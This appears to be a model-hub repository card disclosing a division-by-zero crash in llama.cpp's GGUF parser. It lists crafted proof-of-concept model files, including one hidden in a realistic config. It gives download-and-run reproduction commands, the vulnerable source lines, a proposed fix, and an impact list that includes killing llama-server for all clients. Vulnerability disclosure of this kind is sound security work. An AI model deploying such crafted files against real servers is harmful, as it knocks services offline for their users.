You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

GGUF Division-by-Zero Crash PoC

Vulnerability: Division by zero (SIGFPE) in llama.cpp GGUF parser
Location: ggml/src/gguf.cpp lines 550-552
Affected: All llama.cpp tools (llama-gguf, llama-simple, llama-cli, llama-server)
Severity: DoS (immediate process kill, no recovery)
Tested on: llama.cpp HEAD (ff4affb, 2026-02-15)

PoC Files

File Size Description Crash Location
poc_divzero_ne1.gguf 65B ne[1]=0 gguf.cpp:550
poc_divzero_ne2.gguf 73B ne[2]=0 gguf.cpp:551
poc_divzero_ne3.gguf 81B ne[3]=0 gguf.cpp:552
poc_stealthy_divzero.gguf 224B Hidden in realistic model config gguf.cpp:551
poc_oom_string.gguf 48B Uncontrolled string allocation OOM
poc_invalid_kv_type.gguf 48B Invalid gguf_type enum UB (enum load)
poc_invalid_tensor_type.gguf 65B Invalid ggml_type enum UB (enum load)

Reproduction

git clone https://github.com/ggml-org/llama.cpp
cd llama.cpp && cmake -B build . && cmake --build build
wget https://huggingface.co/Rammadaeus/gguf-divzero-crash-poc/resolve/main/poc_divzero_ne1.gguf
./build/bin/llama-gguf poc_divzero_ne1.gguf r
echo $?  # 136 = SIGFPE

Root Cause

Line 541 checks ne[j] < 0 but allows zero through. Lines 550-552 divide INT64_MAX by ne[1], ne[2], ne[3]:

// gguf.cpp:550-552
if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) ||
           (INT64_MAX/info.t.ne[2] <= info.t.ne[0]*info.t.ne[1]) ||
           (INT64_MAX/info.t.ne[3] <= info.t.ne[0]*info.t.ne[1]*info.t.ne[2]))) {

Fix: Change line 541 from ne[j] < 0 to ne[j] <= 0.

Impact

  • Every llama.cpp tool crashes immediately on load
  • llama-server: one malicious model kills the server for ALL connected clients
  • Automated model pipelines crash without recovery
  • ProtectAI ModelScan 0.8.7 does NOT detect this (skips GGUF files entirely)
Downloads last month
176
GGUF
Model size
0 params
Architecture
llama
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support